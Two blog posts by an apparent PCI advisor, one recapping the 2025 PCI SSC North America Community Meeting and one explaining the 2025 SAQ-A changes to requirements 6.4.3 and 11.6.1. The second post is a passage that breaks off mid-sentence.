Inside the 2025 PCI SSC North America Community Meeting: Insights, Myths, and Key Takeaways
This week, the payments security community gathered in Fort Worth, Texas, for the highly anticipated 2025 PCI SSC North America Community Meeting. Held from September 16–18, the event brought together Council staff, industry experts, and stakeholders from across North America to discuss the latest in payment card security, technical updates, and collaborative opportunities. Setting the Stage: Why the PCI Community Meeting Matters Every year, the PCI SSC North America Community Meeting is more than just a conference; it’s a crucial gathering spot that wouldn’t be the same without the varied perspectives from across the industry, including yours. This event sparks innovation, deepens relationships, and guarantees that the standards safeguarding cardholder data stay strong and up-to-date in a rapidly changing environment. Key Themes and Highlights 1. Technical and Security Updates A central focus of this year’s meeting was on the latest technical and security developments in the payments ecosystem. Council staff and industry leaders shared insights on evolving threats, compliance requirements, and best practices for securing payment data. Attendees learned about upcoming changes to PCI standards and how these will impact merchants, service providers, and solution vendors. 2. Engaging Sessions and Expert Speakers The agenda featured a robust lineup of sessions led by renowned speakers and subject matter experts. Topics ranged from practical guidance on implementing PCI DSS v4.0 to deep dives into emerging technologies such as tokenization, cloud security, and AI-driven fraud prevention. Panel discussions and interactive workshops encouraged lively debate and knowledge sharing among participants. 3. Community Collaboration Collaboration remains a pledge of the PCI Community Meeting. This year’s event emphasized the importance of active participation within the PCI ecosystem. Attendees were encouraged to join Special Interest Groups (SIGs), contribute to standards development, and network with peers facing similar challenges. 4. Looking Ahead: A Global Perspective While the focus was on North America, the meeting also previewed upcoming PCI SSC events in Europe and Asia-Pacific, highlighting the global nature of payment security challenges and the need for international cooperation. My Presentation: Busting PCI Myths A personal highlight this year came unexpectedly when I was asked at the last minute to fill in for a tech talk slot. I presented “Busting PCI Myths: Practical Truths for Real Security,” a topic I’m passionate about after nearly two decades as a QSA and PCI advisor. During my talk, I addressed some of the most persistent misconceptions that continue to circulate in the industry: The key takeaway? Don’t let PCI myths lull you into a false sense of security. Real protection comes from understanding your true responsibilities and building strong, layered defenses. Ongoing Challenges: Requirements 6.4.3 and 11.6.1 Just like last year, there was significant discussion and some confusion around PCI DSS requirements 6.4.3 and 11.6.1. These requirements introduce critical mandates for monitoring and tamper detection, even for merchants completing the simplest SAQ-A. Many attendees were seeking practical guidance on how to implement these controls effectively, especially in cloud environments and where third-party service providers are involved. Final Thoughts The 2025 PCI SSC North America Community Meeting reaffirmed its status as the premier forum for shaping the future of payment security. Whether you’re a seasoned QSA or new to PCI, the event is a reminder that compliance is a journey, not a checkbox. If you missed it, I highly recommend checking out the PCI SSC website for session recordings and resources. Let’s continue to bust myths, share knowledge, and work together to build a stronger, more secure payments ecosystem. Did you attend the meeting or have thoughts on some of the new requirements? Share your experiences in the comments below!
Navigating the New PCI DSS SAQ-A Updates: What Merchants Need to Know
The Payment Card Industry Security Standards Council (PCI SSC) has introduced significant updates to the Self-Assessment Questionnaire A (SAQ-A), effective March 31, 2025. These updates significantly change merchant eligibility requirements and compliance obligations, particularly for e-commerce businesses that outsource cardholder data processing. While the removal of two specific compliance requirements, 6.4.3 and 11.6.1, might initially appear to simplify the compliance process, a closer examination reveals a more complex reality. The updates shift the focus from explicit controls to broader, high-standard obligations, raising the bar for merchants seeking to qualify for SAQ-A. This blog post delves into the key changes to SAQ-A, their implications for merchants, service providers, and Qualified Security Assessors (QSAs), and actionable steps stakeholders can take to navigate this evolving compliance landscape. Understanding the Changes to SAQ-A The updated SAQ-A introduces two major changes: specific compliance requirements (6.4.3 and 11.6.1) are removed, and new eligibility criteria are added. Let’s examine these changes in more detail. 1. Removal of Requirements 6.4.3 and 11.6.1 Previously, SAQ-A merchants needed to comply with the following requirements: Requirement 6.4.3: Mandated the inventory, justification, and control of all scripts on payment pages, ensuring that each script was authorized and its integrity assured. Requirement 11.6.1: Merchants must monitor payment pages for unauthorized modifications, including changes, additions, and deletions to scripts or security-impacting HTTP headers. These controls were designed to protect against malicious script-based attacks, such as eSkimming or Magecart, which target e-commerce systems to compromise sensitive data. However, with the latest SAQ-A update, these requirements are no longer explicitly mandated for SAQ-A merchants. This does not mean that the underlying security objectives have been abandoned. 2. New Eligibility Criteria While removing 6.4.3 and 11.6.1 might seem like a relaxation of obligations, introducing a new eligibility criterion significantly raises the compliance threshold. To qualify for SAQ-A, merchants must now confirm that their entire e-commerce site—not just the payment page—is secure and not susceptible to attacks from malicious scripts. This includes: Protection against first-party, third-party, and external scripts that could compromise e-commerce systems. Comprehensive security measures to prevent vulnerabilities across the entire website beyond the scope of the payment page. This shift in focus creates a circular compliance challenge: even though 6.4.3 and 11.6.1 are no longer required, the new eligibility requirement effectively necessitates adherence to the principles of these controls. Merchants must still implement robust protections, such as script monitoring and integrity checks, to secure their e-commerce environments and maintain compliance. Guidance and Clarifications On February 28, 2025, the PCI SSC released FAQ 1588, further clarifying the updated SAQ-A requirements. Key takeaways include: 1. Scope: The new eligibility criteria apply only to merchant sites hosting embedded payment forms (e.g., iFrames). Redirects or links to payment pages are excluded. Third-party scripts unrelated to payment processing and incapable of compromising account data security are not considered third-party service providers. 2. Eligibility Options: Implementing requirements 6.4.3 and 11.6.1 remains sufficient to meet the new eligibility criteria. Alternative solutions, such as penetration testing, web application firewalls (WAFs), or processor attestations, may also fulfill the criteria, subject to QSA discretion. Provided merchants adhere to implementation guidelines, payment processors can provide written confirmation that their iFrame solutions include necessary protection against script-based attacks. What Hasn’t Changed? Despite the updates to SAQ-A, several key elements remain unchanged: 1. Compliance Deadlines: The deadline for compliance with PCI DSS v4.0.1, including the requirements for 6.4.3 and 11.6.1, remains March 31, 2025, for all merchants not eligible for SAQ-A. 2. Requirements for Service Providers: Service providers must still comply with 6.4.3 and 11.6.1, ensuring comprehensive script inventory, monitoring, and security of payment flows. 3. Security Expectations for SAQ-A Merchants: While the compliance process may appear streamlined, SAQ-A merchants are still expected to implement robust protections against vulnerabilities, particularly those related to script-based attacks. Implications for Stakeholders The changes to SAQ-A have far-reaching implications for merchants, service providers, and QSAs. Here’s what each group needs to know: 1. For SAQ-A Merchants The new eligibility criteria are likely to pose significant challenges for merchants: Eligibility Hurdles: To qualify for SAQ-A, merchants must now secure their entire e-commerce site against script-based attacks. This requires implementing robust script controls and monitoring solutions, even though 6.4.3 and 11.6.1 are no longer explicitly required. Expanded Compliance Obligations: Merchants who cannot meet the new eligibility criteria will need to complete other, more comprehensive Self-Assessment Questionnaires (SAQs), such as SAQ A-EP. This represents a significant compliance uplift, as SAQ A-EP includes 151 requirements compared to the 19 in SAQ-A. 2. For Service Providers Service providers play a crucial role in helping merchants navigate these changes: Educating Merchants: Small merchants must be educated about the importance of script controls and the implications of the new eligibility criteria. Misinterpreting the updates as a relaxation of obligations could leave merchants vulnerable to attacks. Offering Solutions: Service providers can generate additional revenue by offering value-added services that simplify compliance for merchants while enhancing their security posture. For example, solutions that monitor and secure scripts can help merchants meet the new eligibility criteria. 3. For QSAs Qualified Security Assessors must adapt their approach to reflect the new SAQ-A requirements: Clarifying Misconceptions: QSAs must emphasize that removing 6.4.3 and 11.6.1 does not reduce security obligations. Under the new eligibility criteria, the expectation to secure e-commerce environments remains unchanged. Providing Guidance: QSAs should recommend proven tools and solutions, such as Content Security Policies (CSP) and Subresource Integrity (SRI), or third-party platforms, such as Human Security, Source Defense’s platform, or Jscrambler, to help merchants secure their websites and achieve compliance. Addressing the Compliance Challenge Merchants facing the new SAQ-A eligibility criteria have several options to ensure compliance: 1. Conduct Web Application Testing Merchants can take a proactive approach by conducting web application assessments to demonstrate that their e-commerce site is not susceptible to malicious script-based attacks. This approach empowers merchants to provide the evidence needed to satisfy the new eligibility requirements, giving them a sense of control over their compliance. 2. Implement 6.4.3 and 11.6.1 Across the Entire Site Although these